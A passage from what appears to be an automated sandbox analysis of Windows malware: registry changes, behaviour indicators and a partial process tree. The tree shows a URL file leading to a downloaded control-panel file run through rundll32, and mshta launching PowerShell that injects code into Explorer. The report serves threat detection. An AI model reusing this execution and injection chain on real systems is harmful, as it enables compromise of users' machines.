6f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004d57690d2000663431396364336231333836323432386362643031323464353335376131376361393561636632636238646335386639343936386632393664613530633331330000b20009000400efbe4d57690d4d57690d2e000000000000000000000000000000000000000000000000000e337a00660034003100390063006400330062003100330038003600320034003200380063006200640030003100320034006400350033003500370061003100370063006100390035006100630066003200630062003800640063003500380066003900340039003600380066003200390036006400610035003000630033003100330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002bc63fbf1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66343139636433623133383632343238636264303132346435333537613137636139356163663263623864633538663934393638663239366461353063333133000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb763222aa0b9459453ee11b0c5ea4caceb3552fea4c51ffbcbda499cb9a8f99fb763222aa0b9459453ee11b0c5ea4caceb3552d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe3d7a-fa1a-4ec5 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\540bfbf2f5f484f7f5db835b2974894379651078f090ed0782aebf83f0da695b" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e9529d36-a111-483c = fdd245ae76fdd901 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f6bd220a-1db8-49ea = c23f8da376fdd901 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f061b408-c25d-419c RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\01ae952d-5564-4ad5 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c6e16a9d-91e5-4d9d = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b126a22d-6f35-4bac = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d5d892b-9257-4898 = 40f582a376fdd901 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe3d7a-fa1a-4ec5 = 106fc4a876fdd901 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe3d7a-fa1a-4ec5 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cd02386-e334-4a18 = 26ac5ea376fdd901 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c6e16a9d-91e5-4d9d RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\01ae952d-5564-4ad5 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2ba8394e66aa60612e34240d59c3c18260a1f99badb15f9f357401bdfe5b2771" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c6e16a9d-91e5-4d9d = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b2ba88a0-a6dd-4328 = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f061b408-c25d-419c RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3a8476d6-516b-4840 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\01ae952d-5564-4ad5 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f6bd220a-1db8-49ea = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3a8476d6-516b-4840 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e9529d36-a111-483c RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e9529d36-a111-483c = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d5d892b-9257-4898 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cd02386-e334-4a18 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d5d892b-9257-4898 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f6bd220a-1db8-49ea = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3a8476d6-516b-4840 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b2ba88a0-a6dd-4328 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f6bd220a-1db8-49ea RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f061b408-c25d-419c = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fe9117a476fdd901fe9117a476fdd901fe9117a476fdd901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004d576a0d2000346132653439616433383864353130663166346436353930376466343932336533343030383265326163666235313930653964663132623163313061363935610000b20009000400efbe4d576a0d4d576a0d2e00000000000000000000000000000000000000000000000000021ae300340061003200650034003900610064003300380038006400350031003000660031006600340064003600350039003000370064006600340039003200330065003300340030003000380032006500320061006300660062003500310039003000650039006400660031003200620031006300310030006100360039003500610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000002bc63fbf1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34613265343961643338386435313066316634643635393037646634393233653334303038326532616366623531393065396466313262316331306136393561000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062716e646c656b670000000000000000fea4c51ffbcbda499cb9a8f99fb7632228a0b9459453ee11b0c5ea4caceb3552fea4c51ffbcbda499cb9a8f99fb7632228a0b9459453ee11b0c5ea4caceb3552d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0032003800390030003600390036003100310031002d0032003300330032003100380030003900350036002d0033003300310032003700300034003000370034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001e27da6a000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b126a22d-6f35-4bac RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe3d7a-fa1a-4ec5 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe3d7a-fa1a-4ec5 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e9529d36-a111-483c = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4674526b0479bcd3eabcd93a1b2406241817b892d33ee8c099f4976e0873e117" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d5d892b-9257-4898 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9abe3d7a-fa1a-4ec5 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f6bd220a-1db8-49ea RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b2ba88a0-a6dd-4328 = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4a2e49ad388d510f1f4d65907df4923e340082e2acfb5190e9df12b1c10a695a" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f6bd220a-1db8-49ea = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\01ae952d-5564-4ad5 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3a8476d6-516b-4840 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fc0bc24f-a900-456a = "\\\\?\\Volume{6ADA271E-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\540bfbf2f5f484f7f5db835b2974894379651078f090ed0782aebf83f0da695b" RuntimeBroker.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 3712 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepowershell.exeExplorer.EXEpid process 2532 rundll32.exe 2532 rundll32.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3164 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 1752 powershell.exe 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 4280 cmd.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exeExplorer.EXERuntimeBroker.exedescription pid process Token: SeDebugPrivilege 1752 powershell.exe Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3724 RuntimeBroker.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundll32.exepid process 216 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3164 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3164 Explorer.EXE -
Suspicious use of WriteProcessMemory 53 IoCs
Processes:
rundll32.execontrol.exerundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 216 wrote to memory of 2284 216 rundll32.exe control.exe PID 216 wrote to memory of 2284 216 rundll32.exe control.exe PID 2284 wrote to memory of 4588 2284 control.exe rundll32.exe PID 2284 wrote to memory of 4588 2284 control.exe rundll32.exe PID 4588 wrote to memory of 2532 4588 rundll32.exe rundll32.exe PID 4588 wrote to memory of 2532 4588 rundll32.exe rundll32.exe PID 4588 wrote to memory of 2532 4588 rundll32.exe rundll32.exe PID 2560 wrote to memory of 1752 2560 mshta.exe powershell.exe PID 2560 wrote to memory of 1752 2560 mshta.exe powershell.exe PID 1752 wrote to memory of 4792 1752 powershell.exe csc.exe PID 1752 wrote to memory of 4792 1752 powershell.exe csc.exe PID 4792 wrote to memory of 3476 4792 csc.exe cvtres.exe PID 4792 wrote to memory of 3476 4792 csc.exe cvtres.exe PID 1752 wrote to memory of 1620 1752 powershell.exe csc.exe PID 1752 wrote to memory of 1620 1752 powershell.exe csc.exe PID 1620 wrote to memory of 4460 1620 csc.exe cvtres.exe PID 1620 wrote to memory of 4460 1620 csc.exe cvtres.exe PID 1752 wrote to memory of 3164 1752 powershell.exe Explorer.EXE PID 1752 wrote to memory of 3164 1752 powershell.exe Explorer.EXE PID 1752 wrote to memory of 3164 1752 powershell.exe Explorer.EXE PID 1752 wrote to memory of 3164 1752 powershell.exe Explorer.EXE PID 3164 wrote to memory of 3724 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3724 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4280 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 4280 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 4280 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 3724 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3724 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3988 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3988 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3988 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3988 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4884 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4884 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4280 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 4280 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 4884 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4884 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4936 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4936 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4936 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4936 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 2736 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 2736 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 2736 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 2736 3164 Explorer.EXE cmd.exe PID 4280 wrote to memory of 3712 4280 cmd.exe PING.EXE PID 4280 wrote to memory of 3712 4280 cmd.exe PING.EXE PID 4280 wrote to memory of 3712 4280 cmd.exe PING.EXE PID 3164 wrote to memory of 2736 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 2736 3164 Explorer.EXE cmd.exe PID 4280 wrote to memory of 3712 4280 cmd.exe PING.EXE PID 4280 wrote to memory of 3712 4280 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4884
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3988
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\Azienda.url2⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HEITGDYC\modulo[1].cpl",3⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HEITGDYC\modulo[1].cpl",4⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
